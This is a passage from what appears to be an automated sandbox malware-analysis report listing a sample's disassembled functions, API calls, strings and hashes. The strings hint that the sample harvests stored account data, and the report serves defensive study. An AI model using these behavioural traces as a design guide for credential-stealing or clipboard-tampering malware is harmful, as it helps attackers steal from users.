                                                                                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                          • Opcode Fuzzy Hash: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2014503067-0
                                                                                                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76FBDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                                          • API String ID: 403622227-2664311388
                                                                                                                                                                                          • Opcode ID: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                          • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                          • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                          • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                          • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                          • API String ID: 577499730-1134094380
                                                                                                                                                                                          • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
